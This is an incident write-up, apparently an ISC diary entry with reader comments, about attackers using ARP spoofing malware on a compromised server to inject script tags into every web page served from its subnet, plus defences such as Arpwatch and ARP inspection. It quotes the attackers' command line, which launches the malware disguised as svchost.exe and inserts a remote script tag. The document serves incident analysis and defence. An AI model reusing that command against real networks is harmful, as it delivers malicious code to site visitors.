Massive ARP spoofing attacks on web sites

Massive ARP spoofing attacks on web sites
Recently I’ve been involved in two incidents which had exactly the same modus operandi. The attackers used ARP spoofing to inject malicious JavaScript into content served off other web sites. The biggest problem with such attacks is that it can be very difficult to analyze them unless you remember to check layer two network traffic. Such attacks are very covert and put in danger all web sites in the same subnet. So, first a short recap about ARP spoofing. ARP spoofing attacks happen on layer two – the Address Resolution Protocol maps IP addresses and MAC addresses, which is what is used to communicate in local subnets. ARP spoofing attacks are nothing new – they have been happening for years already. The basic idea of an ARP spoofing attack is for the attacker to spoof IP address <-> MAC address pair of the default gateway. This allows him to intercept (and, if needed modify) all outgoing traffic from that subnet. The attacker can also spoof the IP address <-> MAC address pair of a local server in which case he could monitor incoming traffic, but in this scenario that was not necessary. The spoofing attack consists of the attacker sending ARP packets containing fake data to the target. In normal conditions the target machine will accept this and “believe” whatever the attacker is saying. This is exactly what happened in both incidents I was involved in. A server on a local subnet was compromised and the attacker installed ARP spoofing malware (together with keyloggers and other Trojans) on the machine. The ARP spoofing malware poisoned local subnet so the outgoing traffic was tunneled through it. The same malware then inserted malicious JavaScript into every HTML page served by any server on that subnet. You can see how this is fruitful for the attacker – with one compromised server they can effectively attack hundreds of web sites (if it’s a hoster indeed). The ARP spoofing malware they used was relatively common, but still AV detection was miserable with major AV programs missing it (both compromised machines had up to date AV programs installed). In order to start the malware the attackers used a simple BAT script: svchost.exe -idx 0 -ip IP_address -port 80 -insert "<script language=javascript src=http://embedded/images/new.gif></script>" -Interval 1000 -spoofmode 2 svchost.exe’s options are self explanatory – it uses the interface 0 (idx) and spoofs the IP address in the ip option. Finally it inserts whatever is in the insert option into every HTML page served. Nice thing for the attacker is that the administrator of an attacked web site will never figure out what’s going on until he checks the ARP cache or monitors network traffic. The ARP cache can be checked with the arp command (arp –a on both Windows and Linux) – one should watch out for weird MAC addresses. It usually pays to check the OID owner because you don’t see Dell routers all that often as shown in the following Wireshark screenshot of ARP poisoning traffic: There are various ways for defending against ARP spoofing. One can hard code MAC addresses of routers on servers (be careful with this as changes to the default gateway will stop your machines from talking to the Internet until you modify the hard coded address). I would recommend installation of Arpwatch, a nice and simple tool that monitors ARP traffic and alerts on attacks. Finally, Cisco (and others I presume) has features called DHCP Snooping and ARP inspection which can effectively stop ARP poisoning attacks. Sadly, I rarely see these features used, especially in internal network. Regarding other malware I mentioned previously, the AV detection rates were similarly poor (in the mean time they improved). Particularly nasty was the Winlogon Notify hook package which simply “sniffs” all usernames/passwords of users logging in to the system (so password changes don’t help). This package has been around for ages (the source is public) and I was shocked how simple modifications made it “invisible” to those AV programs. -- Bojan INFIGO IS	Bojan 391 Posts ISC Handler Mar 11th 2009
Subscribe	Mar 11th 2009 1 decade ago
"In order to start the malware the attackers used a simple BAT script" ... My assumption: the svchost.exe being called is the legitimate one that comes with Windows. Correct? I can't seem to find related reference documentation on Microsoft that clearly and completely explains svchost.exe's feature set. Can someone point me to this reference material please? http://social.msdn.microsoft.com/Search/en-US/?query=svchost.exe%20spoofmode&resultsLang=en-GB&ac=8 No Results Found	Anonymous
Quote	Mar 11th 2009 1 decade ago
I'm gathering svchost.exe was the malware.	Anonymous
Quote	Mar 11th 2009 1 decade ago
Hi Bart. Yes, svchost.exe was the malware they dropped on the system (sorry, I should have been probably more clear about that).	Bojan 391 Posts ISC Handler
Quote	Mar 11th 2009 1 decade ago
Thanks Bojan.	Anonymous
Quote	Mar 11th 2009 1 decade ago
Fasinating, really. Is the tool able to follow the TCP stream and read the HTTP header ? If it doesn't it's likely to add the link at the end of each frame instead of at the end of each HTML page. The result will probably be corrupted binaries (including images) and pages and that could help detection. Also, Arpwatch is, apparently, *nix only while this attack is apparently based on a windows system. What could be appropriate defenses for co-hosted windows machines, then ?	Anonymous
Quote	Mar 11th 2009 1 decade ago
Stephane, yes the tool is able to read the HTTP header so it injected the malicious script tag only into HTML pages. The malicious script tag was inserted at the beginning of HTML pages. Regarding arpwatch, you are right that this is a *nix only tool. I'm not sure about similar Windows tools -- if we get some submissions from our readers I will update the diary. The best defense are those special features, if the network gear supports them.	Bojan 391 Posts ISC Handler
Quote	Mar 11th 2009 1 decade ago
Thanks for the details, Bojan. Please update the diary if you hear about a windows tool that would do the same thing as arpwatch. As a result of your article, I'm writing such a tool right now (using winPcap) but I'd rather not reinvent the wheel :P	Bojan 16 Posts
Quote	Mar 11th 2009 1 decade ago
Stephane, will do. If you manage to finish the tool let us know, I'm sure other readers will be interested in it as well.	Bojan 391 Posts ISC Handler
Quote	Mar 11th 2009 1 decade ago
There is an alternative program to arpwatch for windows - it is called ARP Monitor. It's in beta stage from early 2008 till now, but is usable and have a few bugs that don't affect it's performance. This program has an English interface though the author of this program is from Russia. The program uses winpcap, so it should be downloaded and installed separately for program to work. Here is a link to the author's blog (sorry, it's in Russian) http://blog.kmint21.com/2008/03/12/arp-monitor/ The direct link to the program: http://blog.kmint21.com/kmint21-arp-monitor.exe btw, in one of his posts that is dated nearly a year ago author of this program says that he is managed to catch with this program virus with the similar behavior...	ArD 6 Posts
Quote	Mar 12th 2009 1 decade ago
Small update to my previous post - the updated version of ARP Monitor tool is available from http://binaryplant.com/ The new version includes some bug fixes to bugs that were discovered in first beta.	ArD 6 Posts
Quote	Mar 12th 2009 1 decade ago
A must read about layer 2 atacks is the excellent book: Lan Switch Security - by Eric Vyncke (author of ETHLOAD for those who remember DOS and packet drivers ;) A free/simple Win32 ARP monitor is winarpwatch (or warpwatch) which can be downloaded from http://sid.rstack.org/arp-sk/ or from http://www.securityfocus.com/data/tools/warpwatch.zip (same file). An advanced/shareware Win32 ARP spoofing detection tool appears to be XArp. A 15-day evaluation version can be downloaded here: http://www.chrismc.de/development/xarp/index.html (my source for both apps is a post by EGeezer in this thread: http://www.dslreports.com/forum/remark,15610372~start=20 ).	Erik van Straten 126 Posts
Quote	Mar 13th 2009 1 decade ago
Cisco (or any other vendor's) DHCP Snooping and Dynamic ARP Inspection (DAI) are useless here. DAI requires DHCP Snooping to function. DHCP Snooping of course inmplies that you're using DHCP to assign you IPs. Who's using DHCP to assign server IPs? Few if any. Sysadmins hardcode server IPs. No remotely knowledge admin would put a DHCP pool in a server subnet for clients to use. So essentially DAI can't help here because DHCP isn't used, preventing DHCP Snooping from seeding DAI with data. Discussing the merits of using static DHCP assignments for servers is another topic for another day. The best way to mitigate this problem in a server farm situation is to use an ARP watching tool like you and others suggested. If the sysadmin and netadmin are one and the same then the static ARP entries on the upstream router would be doable but would be more administratively intensive. If one was going to go that far then they could just as easily put that static ARP entry on the access switch and turn on DAI. ARP Watch is easier I imagine.	Anonymous
Quote	Mar 29th 2009 1 decade ago

Recently I’ve been involved in two incidents which had exactly the same modus operandi. The attackers used ARP spoofing to inject malicious JavaScript into content served off other web sites. The biggest problem with such attacks is that it can be very difficult to analyze them unless you remember to check layer two network traffic. Such attacks are very covert and put in danger all web sites in the same subnet.

So, first a short recap about ARP spoofing. ARP spoofing attacks happen on layer two – the Address Resolution Protocol maps IP addresses and MAC addresses, which is what is used to communicate in local subnets. ARP spoofing attacks are nothing new – they have been happening for years already. The basic idea of an ARP spoofing attack is for the attacker to spoof IP address <-> MAC address pair of the default gateway. This allows him to intercept (and, if needed modify) all outgoing traffic from that subnet. The attacker can also spoof the IP address <-> MAC address pair of a local server in which case he could monitor incoming traffic, but in this scenario that was not necessary.

The spoofing attack consists of the attacker sending ARP packets containing fake data to the target. In normal conditions the target machine will accept this and “believe” whatever the attacker is saying.

This is exactly what happened in both incidents I was involved in. A server on a local subnet was compromised and the attacker installed ARP spoofing malware (together with keyloggers and other Trojans) on the machine. The ARP spoofing malware poisoned local subnet so the outgoing traffic was tunneled through it. The same malware then inserted malicious JavaScript into every HTML page served by any server on that subnet. You can see how this is fruitful for the attacker – with one compromised server they can effectively attack hundreds of web sites (if it’s a hoster indeed).

The ARP spoofing malware they used was relatively common, but still AV detection was miserable with major AV programs missing it (both compromised machines had up to date AV programs installed). In order to start the malware the attackers used a simple BAT script:

svchost.exe -idx 0 -ip IP_address -port 80 -insert "<script language=javascript src=http://embedded/images/new.gif></script>" -Interval 1000 -spoofmode 2

svchost.exe’s options are self explanatory – it uses the interface 0 (idx) and spoofs the IP address in the ip option. Finally it inserts whatever is in the insert option into every HTML page served.

Nice thing for the attacker is that the administrator of an attacked web site will never figure out what’s going on until he checks the ARP cache or monitors network traffic. The ARP cache can be checked with the arp command (arp –a on both Windows and Linux) – one should watch out for weird MAC addresses. It usually pays to check the OID owner because you don’t see Dell routers all that often as shown in the following Wireshark screenshot of ARP poisoning traffic:

There are various ways for defending against ARP spoofing. One can hard code MAC addresses of routers on servers (be careful with this as changes to the default gateway will stop your machines from talking to the Internet until you modify the hard coded address). I would recommend installation of Arpwatch, a nice and simple tool that monitors ARP traffic and alerts on attacks. Finally, Cisco (and others I presume) has features called DHCP Snooping and ARP inspection which can effectively stop ARP poisoning attacks. Sadly, I rarely see these features used, especially in internal network.

Regarding other malware I mentioned previously, the AV detection rates were similarly poor (in the mean time they improved). Particularly nasty was the Winlogon Notify hook package which simply “sniffs” all usernames/passwords of users logging in to the system (so password changes don’t help). This package has been around for ages (the source is public) and I was shocked how simple modifications made it “invisible” to those AV programs.

--
Bojan
INFIGO IS

Bojan

391 Posts
ISC Handler

Mar 11th 2009

"In order to start the malware the attackers used a simple BAT script" ...
My assumption: the svchost.exe being called is the legitimate one that comes with Windows. Correct?

I can't seem to find related reference documentation on Microsoft that clearly and completely explains svchost.exe's feature set. Can someone point me to this reference material please?

http://social.msdn.microsoft.com/Search/en-US/?query=svchost.exe%20spoofmode&resultsLang=en-GB&ac=8
No Results Found

Anonymous

I'm gathering svchost.exe was the malware.

Anonymous

Hi Bart. Yes, svchost.exe was the malware they dropped on the system (sorry, I should have been probably more clear about that).

Bojan

391 Posts
ISC Handler

Thanks Bojan.

Anonymous

Fasinating, really. Is the tool able to follow the TCP stream and read the HTTP header ? If it doesn't it's likely to add the link at the end of each frame instead of at the end of each HTML page. The result will probably be corrupted binaries (including images) and pages and that could help detection. Also, Arpwatch is, apparently, *nix only while this attack is apparently based on a windows system. What could be appropriate defenses for co-hosted windows machines, then ?

Anonymous

Stephane, yes the tool is able to read the HTTP header so it injected the malicious script tag only into HTML pages. The malicious script tag was inserted at the beginning of HTML pages.

Regarding arpwatch, you are right that this is a *nix only tool. I'm not sure about similar Windows tools -- if we get some submissions from our readers I will update the diary. The best defense are those special features, if the network gear supports them.

Bojan

391 Posts
ISC Handler

Thanks for the details, Bojan. Please update the diary if you hear about a windows tool that would do the same thing as arpwatch. As a result of your article, I'm writing such a tool right now (using winPcap) but I'd rather not reinvent the wheel :P

Bojan
16 Posts

Stephane, will do. If you manage to finish the tool let us know, I'm sure other readers will be interested in it as well.

Bojan

391 Posts
ISC Handler

There is an alternative program to arpwatch for windows - it is called ARP Monitor. It's in beta stage from early 2008 till now, but is usable and have a few bugs that don't affect it's performance. This program has an English interface though the author of this program is from Russia. The program uses winpcap, so it should be downloaded and installed separately for program to work. Here is a link to the author's blog (sorry, it's in Russian) http://blog.kmint21.com/2008/03/12/arp-monitor/
The direct link to the program: http://blog.kmint21.com/kmint21-arp-monitor.exe

btw, in one of his posts that is dated nearly a year ago author of this program says that he is managed to catch with this program virus with the similar behavior...

ArD

6 Posts

Small update to my previous post - the updated version of ARP Monitor tool is available from http://binaryplant.com/ The new version includes some bug fixes to bugs that were discovered in first beta.

ArD

6 Posts

A must read about layer 2 atacks is the excellent book: Lan Switch Security - by Eric Vyncke (author of ETHLOAD for those who remember DOS and packet drivers ;)
A free/simple Win32 ARP monitor is winarpwatch (or warpwatch) which can be downloaded from http://sid.rstack.org/arp-sk/ or from http://www.securityfocus.com/data/tools/warpwatch.zip (same file). An advanced/shareware Win32 ARP spoofing detection tool appears to be XArp. A 15-day evaluation version can be downloaded here: http://www.chrismc.de/development/xarp/index.html
(my source for both apps is a post by EGeezer in this thread: http://www.dslreports.com/forum/remark,15610372~start=20 ).

Erik van Straten

126 Posts

Cisco (or any other vendor's) DHCP Snooping and Dynamic ARP Inspection (DAI) are useless here. DAI requires DHCP Snooping to function. DHCP Snooping of course inmplies that you're using DHCP to assign you IPs. Who's using DHCP to assign server IPs? Few if any. Sysadmins hardcode server IPs. No remotely knowledge admin would put a DHCP pool in a server subnet for clients to use. So essentially DAI can't help here because DHCP isn't used, preventing DHCP Snooping from seeding DAI with data. Discussing the merits of using static DHCP assignments for servers is another topic for another day.

The best way to mitigate this problem in a server farm situation is to use an ARP watching tool like you and others suggested. If the sysadmin and netadmin are one and the same then the static ARP entries on the upstream router would be doable but would be more administratively intensive. If one was going to go that far then they could just as easily put that static ARP entry on the access switch and turn on DAI. ARP Watch is easier I imagine.

Anonymous